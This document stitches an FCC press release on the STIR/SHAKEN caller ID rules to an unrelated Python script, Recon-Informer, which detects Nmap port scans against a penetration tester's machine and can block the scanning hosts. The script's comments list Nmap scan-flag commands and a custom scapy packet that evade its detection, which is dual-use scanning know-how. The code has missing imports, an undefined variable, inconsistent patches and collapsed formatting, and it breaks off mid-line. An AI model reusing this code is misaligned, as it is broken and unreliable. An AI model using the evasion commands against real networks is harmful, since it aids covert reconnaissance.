    WASHINGTON, March 31, 2020—The Federal Communications Commission today adopted new rules requiring implementation of caller ID authentication using technical standards known as “STIR/SHAKEN.” These rules will further the FCC’s efforts to protect consumers against malicious caller ID “spoofing,” which is often used during robocall scam campaigns to trick consumers into answering their phones. STIR/SHAKEN enables phone companies to verify that the caller ID information transmitted with a call matches the caller’s phone number. Widespread deployment of STIR/SHAKEN will reduce the effectiveness of illegal spoofing, allow law enforcement to identify bad actors more easily, and help phone companies identify calls with illegally spoofed caller ID information before those calls reach their subscribers.

    Today’s Order requires all originating and terminating voice service providers to implement STIR/SHAKEN in the Internet Protocol (IP) portions of their networks by June 30, 2021, a deadline that is consistent with Congress’s direction in the recently-enacted TRACED Act. The FCC laid the groundwork for these new rules when it formally proposed and sought public comment on mandating STIR/SHAKEN implementation in June 2019.

    The FCC today also adopted a Further Notice of Proposed Rulemaking to take public comment on expanding the STIR/SHAKEN implementation mandate to cover intermediate voice service providers; extending the implementation deadline by one year for small voice service providers pursuant to the TRACED Act; adopting requirements to promote caller ID authentication on voice networks that do not rely on IP technology; and implementing other aspects of the TRACED Act.

    The FCC estimates that the benefits of eliminating the wasted time and nuisance caused by illegal scam robocalls will exceed $3 billion annually, and STIR/SHAKEN is an important part of realizing those cost savings. Additionally, when paired with call analytics, STIR/SHAKEN will help protect American consumers from fraudulent robocall schemes that cost Americans approximately $10 billion annually. Improved caller ID authentication will also benefit public safety by reducing spoofed robocalls that disrupt healthcare and emergency communications systems. Further, implementation of STIR/SHAKEN will restore consumer trust in caller ID information and encourage consumers to answer the phone, to the benefit of consumers, businesses, healthcare providers, and non-profit organizations.

    Over the past three years, the FCC has aggressively pursued a multi-part strategy for combatting spoofed robocalls—issuing hundreds of millions of dollars in fines for violations of its Truth in Caller ID rules; expanding those rules to reach foreign calls and text messages; enabling voice service providers to block certain clearly unlawful calls before they reach consumers’ phones; and clarifying that voice service providers may offer call-blocking services by default. The FCC has also called on the industry to “trace back” illegal spoofed calls and text messages to their original sources.

    More information on caller ID authentication, including STIR/SHAKEN, is available at: https://www.fcc.gov/call-authentication. Consumers can also find tips for protecting themselves against malicious spoofing at: https://www.fcc.gov/spoofing.

    Action by the Commission March 31, 2020 by Report and Order and Further Notice of Proposed Rulemaking (FCC 20-42). Chairman Pai, Commissioners O’Rielly, Carr, Rosenworcel, and Starks approving and issuing separate statements.

    WC Docket Nos. 17-97, 20-67
  10. Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.

    Recon-Informer.py

    import logging,os,ctypes,sys,argparse,time,re
    from subprocess import *
    from datetime import datetime
    from pkgutil import iter_modules
    import pkg_resources

    #Recon-Informer (c)
    #By John Page (Hyp3rlinx)
    #ApparitionSec
    #hyp3rlinx.altervista.org
    #twitter.com/hyp3rlinx
    #apparitionsec@gmail.com
    #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
    #==========================================================
    #
    #Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive
    #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
    #
    #Purpose:
    #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever.
    #Its purpose is to detect possible recon against our attacker system on a LAN to provide us defensive intel.
    #Therefore, this script is most useful for basic short-term defensive visibility.
    #
    #Features:
    #Attempt to detect and identify typical port scans generated using Nmap including scan type.
    #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
    #
    #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result.
    #XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
    #NULL is another type that doesn't work well on Windows.
    #
    #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS
    #it's run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
    #With -s flag you can add extra scan types to detect that otherwise would be ignored.
    #
    #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
    #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you
    #will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
    #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag.
    #
    #ICMP
    #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping.
    #
    #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS.
    #Firewall rule for blocks are in-bound "ANY" but still allows out-bound.
    #FW rules are named like ReconInformer_<HOST-IP>.
    #
    #DELETE FW RULE -d <IP-ADDR> to remove FW rules for blocked hosts.
    #
    #WHITELIST -w HOST-IP(s) you never want to block on.
    #
    #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc.
    #ignore packets destined for specific ports to try reduce false positive probe alerts.
    #
    #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS
    #from SMB connected shares to try reduce false positives.
    #
    #LOG -l flag, default size limit for writing to disk is 1MB.
    #
    #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc.
    #To detect UDP scans use the -u flag, then can also combine with -f port filter
    #(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
    #
    #PCAP saving -s flag, default size limit is also 1MB.
    #
    #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect.
    #
    #Private Network range:
    #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored.
    #
    #BYPASS examples --scanflags and custom packet window sizes:
    #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
    #
    #These scans can bypass Recon-Informer and correctly report open ports found.
    #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
    #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
    #
    #Therefore, I accounted for some of these in Recon-Informer to report these detections.
    #
    #SCANFLAGS
    #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
    #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
    #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothing useful returned)
    #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
    #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
    #
    #The above scanflag examples would have bypassed detection if we didn't check packets for them.
    #Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks:
    #
    #10  (0x00a) SYNPSH
    #34  (0x022) SYNURG
    #42  (0x02a) SYNPSHURG
    #66  (0x042) SYNECN
    #74  (0x04a) SYNPSHECN
    #98  (0x062) SYNURGECN
    #106 (0x06a) SYNPSHURGECN
    #130 (0x082) SYNCWR
    #138 (0x08a) SYNPSHCWR
    #162 (0x0a2) SYNURGCWR
    #170 (0x0aa) SYNPSHURGCWR
    #194 (0x0c2) SYNECNCWR
    #202 (0x0ca) SYNPSHECNCWR
    #226 (0x0e2) SYNURGECNCWR
    #234 (0x0ea) SYNPSHURGECNCWR
    #
    #Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!
    #ip=IP(dst="192.168.1.104")
    #syn=TCP(sport=54030,dport=139,window=666,flags="S")
    #send(ip/syn)
    #
    #Custom packet tests were tested on Kali to Win7/10 machines.
    #Recon-Informer tries to inform about most typical out-of-the-box type of scans.
    #
    #Service scans -A detection:
    #nmap -n -Pn -T4 -A x.x.x.x -p22
    #If we scan from Kali Linux to Windows machine port 23 using -A we see SYN followed by XMAS
    #also we see an immediate high port of like 30000 or more.
    #
    #But scanning Windows ports 135 - 139 we see FSPU flags set so we can be fairly confident
    #it is a Service scan -A also it usually is followed by scanning high ports of 30000 or greater.
    #
    #However, I found that an easier way to pick up service -A scans is checking the window size.
    #If the window size is 65535 we can be fairly certain it's a service -A scan.
    #Sometimes -A scan seems only to be detected when certain ports are hit.
    #
    #Example, Windows ports 135,139 or Kali Linux ports 1, 22 etc...
    #If not targeting port 135/139 (windows) -A detect may get missed.
    #Testing on newest nmap on Kali seemed to be easier to detect -A scan on ports other than 135/139.
    #Anyway, added this to try get more intel about possible incoming probes.
    #
    #DECOY SCAN -D detection set to a threshold of two or more ip-addresses.
    #
    #Examples:
    #capture TCP packets only, restores console on detection, detect ping sweep and ICMP
    #Recon-Informer.py -i <ATTACKER-BOX> -r -p
    #
    #capture UDP, whitelist ips, block, log, restore console, save pcap, detect XMAS,NULL on Win OS box.
    #Recon-Informer.py -i <ATTACKER-BOX> -u -w -b -l -r -a -s X,N
    #
    #capture UDP, filter ports, whitelist ips, block and deletes a previous FW rule
    #Recon-Informer.py -i <ATTACKER-BOX> -u -f 137,161 -w -b -d <HOST-IP>
    #
    #ignore specific hosts for whatever reason you may have
    #Recon-Informer.py -i <ATTACKER-BOX> -n host1, host2
    #
    #capture TCP packets block all offending hosts (in-bound only) on detection, filter port 7680 MS WUDO
    #Recon-Informer.py -i <ATTACKER-BOX> -b -f 7680
    #
    #Dependencies:
    #npcap or winpcap, scapy, clint and pygetwindow.
    #
    #Tested Win7/10/Linux/Kali - Wired Ethernet LAN and Wifi networks.
    #
    #Scapy Errors:
    #If get scapy runtime error "NameError: global name 'log_runtime' is not defined on scapy"
    #OR you get "ImportError: cannot import name NPCAP_PATH"
    #Download the latest https://github.com/secdev/scapy
    #These were bugs in scapy that have been fixed in 2.4.3.
    #
    #========================================================================================
    #Packet window size tests:
    #
    #CONNECT -sT scan window size anomalies and example of port detection bypass.
    #What's nice about detecting CONNECT scans is if someone does a telnet x.x.x.x <port> it
    #should also get flagged by Recon-Informer. FYI, if SYN scan is run as non-root user
    #it becomes CONNECT scan.
    #
    #1) Custom scapy CONNECT scan from Kali to Win7/Win10 box with SYN flag set window size is 8192
    #2) Nmap -sT CONNECT Win10 to Win7 used window size of 64240
    #3) Nmap -sT CONNECT i686 i386 GNU/Linux box with Nmap v4.11 to Win7/Win10 had window size 5840
    #4) Nmap -sT CONNECT Kali to Win7/Win10 used window size of 29200
    #5) Nmap -sT CONNECT Win7 to Win10 also window size was 8192 as in case 1)
    #
    #Nmap versions 4.11, 7.70 and 7.80 were used for port scan testing:
    #However, we may not be able to catch them all, like when custom window size is used.
    #
    #False positives:
    #Some ports (MS UPNP Host port 2869) as they show up as CONNECT or MAIMON
    #scans on some noisy networks. HTTP GET requests can also be flagged as CONNECT scans.
    #TCP source port 443 can also get picked up from web browsers or webapps.
    #=======================================================================================
    #
    #VM and NAT setups:
    #
    #TEST -sZ COOKIE_ECHO:
    #1) Kali to Win (NAT) we see 3-way handshake and no SCTP packets
    #2) Win to Win 10. range we see the SCTP packets
    #
    #TEST -sT CONNECT
    #1) Win to Win 10.x.x.x range we see correct packets in wireshark
    #SYN packet with a large amount of TCP options
    #
    #If use NAT mode on VM the machine may perform 3-way handshake
    #Recon-Informer may report SYN scans as CONNECT scans as they become ambiguous.
    #
    #
    #DISCLAIMER:
    #Author is NOT responsible for any damages whatsoever by using this software,
    #by using Recon Informer you assume and accept all risk implied or otherwise.
    #=======================================================================================

    BANNER="""
        ____                         ____      ____
       / __ \___  _________  ____   /  _/___  / __/___  _________ ___  ___  _____
      / /_/ / _ \/ ___/ __ \/ __ \  / // __ \/ /_/ __ \/ ___/ __ `__ \/ _ \/ ___/
     / _, _/  __/ /__/ /_/ / / / /_/ // / / / __/ /_/ / /  / / / / / /  __/ /
    /_/ |_|\___/\___/\____/_/ /_//___/_/ /_/_/  \____/_/  /_/ /_/ /_/\___/_/

        v1 Intel for offensive systems
        ---------------------------
        By Hyp3rlinx
        ApparitionSec
    """

    local_ip_address=""
    OS="win32"
    whitelist_conf="Recon-Whitelist.txt"
    ip_whitelist=set()
    attacker_ip_set=set()
    priv24 = re.compile("^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
    priv20 = re.compile("^192\.168\.\d{1,3}.\d{1,3}$")
    priv16 = re.compile("^172.(1[6-9]|2[0-9]|3[0-1]).[0-9]{1,3}.[0-9]{1,3}$")
    recon_log="ReconLog.txt"
    pcap_file="ReconPcap.pcap"
    max_log_sz=1024.0           #1MB default log and pcap file size limit
    service_scan_win_sz=65535   #Detect -A scan
    ip_proto_scan_lst=[]        #Detect -sO scan
    scan_detect_lst=[]          #Deal with OS and scans like FIN,NUL,XMAS

    #Enforce run as admin.
    def isAdmin():
        try:
            is_admin = (os.getuid() == 0)
        except AttributeError:
            is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
        if not is_admin:
            print("[!] Run me from an elevated command line.")
            sys.exit(1)

    #Check FW rules exist.
    def getFirewall_rules(IP):
        global OS
        try:
            if OS=="win32":
                CMD="netsh advfirewall firewall show rule name=ReconInformer_"+IP+" verbose"
            else:
                CMD="iptables -L INPUT -v -n"
            net=Popen(CMD, shell=True, stderr=PIPE, stdout=PIPE )
            output, errors = net.communicate()
            #communicate() returns bytes; decode before the substring test so this works on Python 3 too
            if IP in output.decode(errors="ignore"):
                return True
            else:
                return False
        except Exception as e:
            pass
        return False

    #Block IP in-bound, allow out.
    def firewall_ip(ip):
        global OS
        try:
            if OS=="win32":
                #Parameter is "ip" (lower case); the original "IP" here was an undefined name
                if not getFirewall_rules(ip):
                    os.system("netsh advfirewall firewall add rule name=ReconInformer_"+ip+" dir=in interface=any action=block remoteip="+ip+ ">nul 2>&1")
            else:
                #Block ANY new in-bound connection but allow outbound.
if not getFirewall_rules(IP): os.system("iptables -A INPUT -s "+ip+" -m state --state NEW -j DROP") except Exception as e: print(str(e)) #Delete FW rules. def rem_firewall_rule(ip_lst): global OS try: for addr in ip_lst: time.sleep(0.3) if is_ip_private(addr): CMD="netsh advfirewall firewall delete rule name=ReconInformer_"+addr if OS!="win32": CMD="iptables -D INPUT -s "+addr+" -m state --state NEW -j DROP" if getFirewall_rules(addr): os.system(CMD) print(colored.cyan("[!] deleted fw rule: ReconInformer_"+addr)) time.sleep(2) else: print(colored.cyan("[!] Firewall rule: ReconInformer_"+addr+" does not exist.")) else: print(colored.cyan("[!] Invalid or non private ip-address.")) sys.stdout.flush() except Exception as e: print(str(e)) def valid_ip(addr): try: socket.inet_aton(addr) return True except socket.error: return False #Never block on specified hosts def whitelist(): global whitelist_conf, ip_whitelist if os.path.exists(whitelist_conf): if os.stat(whitelist_conf).st_size == 0: print(colored.cyan("[!] Recon_Whitelist.txt is empty.")) exit() wl=open(whitelist_conf, "r") for ip in wl: ip = ip.strip() if not valid_ip(ip): print(colored.cyan("[!] Invalid IP: "+ip)) else: #Check IP is in LAN range. if is_ip_private(ip): ip_whitelist.add(ip) else: print(colored.cyan("[!] Non private IP(s) will not be added: "+ip)) print(colored.cyan("[-] Whitelisting: ")+colored.green(ip)) time.sleep(0.1) wl.close() print("\n") else: print(colored.cyan(whitelist_conf+" does not exist.")) exit() sys.stdout.flush() #Disk write chk. def getsize(log_file): sz=0 try: if os.path.exists(log_file): sz = round(os.path.getsize(log_file)/float(1<<10)) except Exception as e: pass return sz def log(data): global recon_log, max_log_sz try: if getsize(recon_log) < max_log_sz: f=open(recon_log,"a") f.write(data+"\r\n") f.close() else: print(colored.cyan("[!] 
Log size of "+str(max_log_sz)+" limit reached, logging stopped.")) sys.stdout.flush() except Exception as e: pass def detection_time(): recon_time = str(datetime.now()) recon_time = recon_time.replace(":","-").replace(" ","_") return recon_time #Filter. def capture_filter(udp_capture, ping_sweep): global local_ip_address HOST="(dst net "+local_ip_address+")" WINDOW_SZ="tcp[14:2]==1024||tcp[14:2]==2048||tcp[14:2]==3072||tcp[14:2]==4096||tcp[14:2]==29200||tcp[14:2]==5840||tcp[14:2]==8192||tcp[14:2]==64240" SYN_SCAN="tcp[13]==2 && tcp[13]!=16" NULL_SCAN="tcp[13]==0" XMAS="tcp[13] & 1!=0 && tcp[13] & 32!=0 && tcp[13] & 8!=0" SCTP="sctp" FRAG="ip[6] = 32 or icmp[1]==4" ICMP="icmp" ARP="arp[6:2]==1" #opcode 1 (request) or 2 (reply). if udp_capture and not ping_sweep: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ+"||"+SCTP+"||"+"udp"+"&&"+"dst net "+local_ip_address) elif udp_capture and ping_sweep: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ+"||"+SCTP+"||"+ARP+"||"+"udp"+"&&"+"dst net "+local_ip_address) elif ping_sweep: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ +"||"+SCTP+"||"+ICMP+"||"+FRAG+"||"+ARP+"&&"+"dst net "+local_ip_address) else: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ +"||"+SCTP+"||"+ICMP+"||"+FRAG+"&&"+"dst net "+local_ip_address) #Private ip range. def is_ip_private(ip): global priv24,priv20,priv16 res = priv24.match(ip) or priv20.match(ip) or priv16.match(ip) return res is not None def fw_block_inbound(addr): fw_rules = getFirewall_rules(addr) if not fw_rules and addr in ip_whitelist: return colored.cyan("[!] Machine whitelisted.") elif not fw_rules and addr not in ip_whitelist: #Extra network range check if is_ip_private(addr): firewall_ip(addr) return colored.cyan(colored.magenta("[+] Blocking IP: "+addr)) else: return colored.cyan("[!] 
"+addr+" is blocked at the Firewall.") sys.stdout.flush() def save_pcap(pkt): global pcap_file, max_log_sz if getsize(pcap_file) < max_log_sz: try: wrpcap(pcap_file, pkt, append=True) except Exception as e: pass else: print(colored.cyan("[!] Pcap size of "+str(max_log_sz)+" limit reached, pcap not saved.")) sys.stdout.flush() def restore_console(): global recon_win, OS if recon_win and OS=="win32": #Restore console if minimized try: recon_win.restore() except Exception as e: pass def doit(pkt): global local_ip_address, _args, attacker_ip_set, ip_proto_scan_lst, OS, recon_win global gw, no_report_scan_list, dst_port_whitelist, scan_detect_lst SCAN_TYPE="" scan_flags="" service_scan="" fragmented=False addr="" dest="" mac="" pnum="" lines=60 #Deal with ping sweep -sn -sP try: if pkt.haslayer(ARP): addr = str(pkt[ARP].psrc) mac = str(pkt[Ether].src) print(colored.red("[+] Recon:"+" "*(len("ARP Ping sweep")-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1))) print(colored.cyan("[*] ARP Ping sweep" +" | " + addr + " | " + str(mac))) print(colored.red("-"*lines)) sys.stdout.flush() #IP layer, LAN and Check Target if IP not in pkt or not is_ip_private(pkt[0][IP].src) or pkt[0][IP].dst != local_ip_address: return #Ping if str(pkt.haslayer(ICMP)): if str(pkt.getlayer(ICMP).type) == "8": print(colored.cyan("[*] Ping detected from: "+pkt[0][IP].src)) print(colored.red("-"*lines)) sys.stdout.flush() except Exception as e: pass #Handle fragmented packets -f if str(pkt[0][IP].flags)=="MF": fragmented=True try: dest=str(pkt[0][IP].dst) addr=str(pkt[0][IP].src) mac=str(pkt[Ether].src) pnum=str(pkt[IP].dport) win_sz = pkt[0][IP].window #Skip ignored hosts or filtered dest ports. if addr in no_report_scan_list or pnum in dst_port_whitelist: return except Exception as e: pass #Report fragmented packets -f. 
if fragmented==True: SCAN_TYPE="Fragmented" try: if pnum != "": print(colored.red("[+] Recon:"+" "*(len("Fragmented")-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1)+"Port: ")) print(colored.cyan("[*] Fragmented" +" | " + addr + " | " + str(mac)+ " | " + pnum)) else: print(colored.red("[+] Recon:"+" "*(len("Fragmented")-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1))) print(colored.cyan("[*] Fragmented" +" | " + addr + " | " + str(mac))) print(colored.red("-"*lines)) sys.stdout.flush() except Exception as e: pass if _args.block_mode: print(fw_block_inbound(addr)) if _args.log_probe: info = "Source: " +addr + " | " + "Dest: "+dest + " | " + mac + " | " + "Fragmented packet | " + detection_time() log(info) if _args.archive: save_pcap(pkt) if recon_win and OS=="win32": restore_console() return #Noisy port if OS == "win32" and pnum == "2869": print(colored.cyan("[!] Port 2869 MS UPNP noise?, see -f flag")) sys.stdout.flush() #Noisy port if pnum == "7680": print(colored.cyan("[!] Port 7680 MS WUDO noise?, see -f flag")) sys.stdout.flush() if UDP in pkt[0]: SCAN_TYPE = "UDP" if TCP in pkt: try: flags = str(pkt[0][TCP].flags) options = str(pkt[0][TCP].options) if (flags=="S" or pkt[0][TCP].flags==0x002) and len(flags)==1: SCAN_TYPE = "SYN" #Handle useful --scanflags 0 - 255 if (flags=="SP") or (pkt[0][TCP].flags==0x00a) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags="SYN, PSH" if (flags=="SU") or (pkt[0][TCP].flags==0x022) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags = "SYN, URG" if (flags=="SPU") or (pkt[0][TCP].flags==0x02a) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG" if (flags=="SE") or (pkt[0][TCP].flags==0x42) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags = "SYN, ECN" if (flags=="SPE") or (pkt[0][TCP].flags==0x04a) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, ECN" if (flags=="SUE") or (pkt[0][TCP].flags==0x062) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, URG, ECN" if (flags=="SPUE") or 
(pkt[0][TCP].flags==0x06a) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, ECN" if (flags=="SC") or (pkt[0][TCP].flags==0x082) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags = "SYN, CWR" if (flags=="SPC") or (pkt[0][TCP].flags==0x08a) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, CWR" if (flags=="SUC") or (pkt[0][TCP].flags==0x0a2) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, URG, CWR" if (flags=="SPUC") or (pkt[0][TCP].flags==0x0a2) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, CWR" if (flags=="SPUC") or (pkt[0][TCP].flags==0x0aa) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, CWR" if (flags=="SEC") or (pkt[0][TCP].flags==0x0c2) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, ECN, CWR" if (flags=="SPEC") or (pkt[0][TCP].flags==0x0ca) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, ECN, CWR" if (flags=="SUEC") or (pkt[0][TCP].flags==0x0e2) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, URG, ECN, CWR" if (flags=="SPUEC") or (pkt[0][TCP].flags==0x0ea) and len(flags)==5: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, ECN, CWR" #Handle -A Service scans. if (flags=="SE" or pkt[0][TCP].flags==0x042) and len(flags)==2: #We can miss detects from old systems unless hits port 135/139 (Win OS). 
service_scan="Service Scan -A" if (flags=="SEC" or pkt[0][TCP].flags==0x8c2) and len(flags)==3: service_scan="Service Scan -A" if (flags=="FSPU" or pkt[0][TCP].flags==0x02b) and len(flags)==4: service_scan="Service Scan -A" if win_sz == service_scan_win_sz: service_scan="Service Scan -A" if (flags=="S" or pkt[0][TCP].flags==0x002) and len(flags)==1 and len(options)>15: SCAN_TYPE = "CONNECT" lines=58 #FW scan -sA if (flags=="A" or pkt[0][TCP].flags==0x010) and len(flags)==1: SCAN_TYPE = "ACK" if "F" in scan_detect_lst or OS != "win32": if (flags=="F" or pkt[0][TCP].flags==0x001) and len(flags)==1: SCAN_TYPE = "FIN" if "N" in scan_detect_lst or OS != "win32": if (flags=="" or pkt[0][TCP].flags==0x000) and len(flags)==0: SCAN_TYPE = "NULL" if "X" in scan_detect_lst or OS != "win32": if (flags=="FPU" or pkt[0][TCP].flags==0x029) and len(flags)==3: SCAN_TYPE = "XMAS" if "M" in scan_detect_lst or OS != "win32": if (flags=="FA" or pkt[0][TCP].flags==0x011) and len(flags)==2: SCAN_TYPE = "MAIMON" lines=58 except Exception as e: pass else: try: if IP in pkt: if "SCTP": if (str(pkt[0][IP].flags)=="" or pkt[0][IP].flags == 0) and pkt[0][IP].len==52 and pkt[0][IP].type==1: SCAN_TYPE = "SCTP" if "SCTP_COOKIE_ECHO": if (str(pkt[0][IP].flags)=="" or pkt[0][IP].flags==0) and pkt[0][IP].type==10: SCAN_TYPE = "SCTP_COOKIE_ECHO" lines=69 except Exception as e: pass #Bail if no scan type. if SCAN_TYPE=="": return #Try detect IP Protocol scan, not full proof as consecutive ACK, SCTP packets will be flagged. if SCAN_TYPE=="ACK" or SCAN_TYPE=="SCTP" and len(ip_proto_scan_lst) < 2: #Don't add same scan type twice. if SCAN_TYPE not in ip_proto_scan_lst: ip_proto_scan_lst.append(SCAN_TYPE) if len(ip_proto_scan_lst)==2: print(colored.cyan("[*] Possible IP Protocol Scan -sO")) sys.stdout.flush() #Reset the list. ip_proto_scan_lst=[] #Clear any old one off ACK or SCTP scan flags hanging around. 
elif SCAN_TYPE != "ACK" or SCAN_TYPE != "SCTP": ip_proto_scan_lst=[] print(colored.red("[+] Recon:"+" "*(len(SCAN_TYPE)-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1)+"Port: ")) print(colored.green("[+] "+SCAN_TYPE + " | " + addr + " | " + str(mac) + " | " + pnum)) if scan_flags != "": print(colored.cyan("[*] --scanflags "+scan_flags)) if service_scan != "": print(colored.cyan("[*] "+service_scan)) if _args.block_mode: print(fw_block_inbound(addr)) if addr not in attacker_ip_set: attacker_ip_set.add(addr) if len(attacker_ip_set) >= 2: print(colored.cyan("[!] Multiple hosts detected, possible -D decoy scan.")) attacker_ip_set=set() print(colored.red("-"*lines)) sys.stdout.flush() #Log if _args.log_probe: try: info = ("Source: "+ addr + " | " + "Dest: "+local_ip_address+" | "+SCAN_TYPE+" | "+ "MAC: "+str(pkt[0][Ether].src)+" | "+ "Port: " + str(pkt[0][IP].dport)+" | "+detection_time()) if scan_flags != "": info = info + " | " + "--scanflags: " + scan_flags elif service_scan != "": info = info + " | " + service_scan elif scan_flags != "" and service_scan != "": info = info + " | " + "--scanflags: " + scan_flags + " | " + service_scan except Exception as e: pass finally: log(info) #Save PCAP if _args.archive: save_pcap(pkt) #Restore console if recon_win and OS=="win32": restore_console() def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_addr", required=True, help="<ATTACKER-IP-ADDR>.") parser.add_argument("-b", "--block_mode", nargs="?", const="1", help="Block IP at Firewall, default block any in-bound, allow out.") parser.add_argument("-d", "--delete_fw", help="Unblock firewalled IP(s) <-d host1, host2>.") parser.add_argument("-u", "--udp", nargs="?", const="1", help="UDP capture.") parser.add_argument("-s", "--scan_type", help="Report non-workable anomalous (on Windows OS) scan types XMAS,FIN,NULL,MAIMON <-s X, F, N, M>.") parser.add_argument("-p", "--ping_sweep", nargs="?", const="1", help="Detect ping sweeps -sP, -sn, may fail 
if -Pn is used in the scan.") parser.add_argument("-f", "--filter_dst_port", help="Filter dest ports <-f 53,137,161,2869,..> reduce noise NBNS, DNS etc.") parser.add_argument("-w", "--whitelist", nargs="?", const="1", help="Whitelist IP from FW block.") parser.add_argument("-n", "--no_report", help="Ignore packets from server <-n host1, host2>.") parser.add_argument("-r", "--restore_console", nargs="?", const="1", help="Restores console window if minimized (Window only).") parser.add_argument("-a", "--archive", nargs="?", const="1", help="Save PCAP (appends to pcap) size limit 1MB.") parser.add_argument("-l", "--log_probe", nargs="?", const="1", help="Log detected probes (appends log) size limit set at 1MB.") return parser.parse_args() #Ensure module exists def haslib(lib): if not lib in (name for loader, name, ispkg in iter_modules()): print("[!] "+lib+ " does not exist, pip install "+lib) exit() return True #Try deal with known bugs in some scapy versions so people don't lose their minds. def scapy_ver(): ver = pkg_resources.get_distribution("scapy").version if ver=="2.4.1" or ver=="2.4.2": print("[!] Known bugs in scapy versions 2.4.1 and 2.4.2") print("[!] Scapy version detected is " +ver+" update to 2.4.3 or latest.") return False return True def recon_init(udp, ping_sweep): while True: try: sniff(filter = capture_filter(udp, ping_sweep), prn=doit, count=10, store=0) time.sleep(1) except Exception as e: pass def main(args): global _args, local_ip_address, OS, block_ip, recon_log, dst_port_whitelist global pcap_file, recon_win, gw, no_report_scan_list, scan_detect_lst if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) #Assign args to global var to ref in other functions. 
_args = args print(colored.red("[*] Packets can be forged.")) print(colored.red("[*] False positives may occur.")) print(colored.red("[*] Attackers need protection too.")) print(colored.red("[*] Anything can be bypass, use at own risk.")) print(colored.red("[/] Listening...\n")) sys.stdout.flush() _os = sys.platform if _os!="win32": OS="Linux" recon_win=False dst_port_whitelist="" no_report_scan_list="" src_port_whitelist="" if OS=="win32": ctypes.windll.kernel32.SetConsoleTitleA("Recon-Informer v1") else: sys.stdout.write(b'\33]0;Recon-Informer v1\a') sys.stdout.flush() if args.restore_console and OS=="win32": try: import pygetwindow as gw recon_win = gw.getWindowsWithTitle("Recon-Informer v1")[0] except Exception as e: pass elif args.restore_console and OS!="win32": print(colored.cyan("[!] Skipped -r Windows only.")) if args.ip_addr: if not valid_ip(args.ip_addr): print(colored.cyan("[!] Invalid IP.")) exit() else: local_ip_address=args.ip_addr if args.block_mode: print(colored.cyan("[!] Warning -b, spoofing can DoS in-bound.")) if not args.whitelist: print(colored.cyan("[!] No whitelist, all IPs blocked.")) if args.udp: print(colored.cyan("[!] udp equals more noise, see -f or -n flags.")) if args.ping_sweep: print(colored.cyan("[!] I see your using -p, most 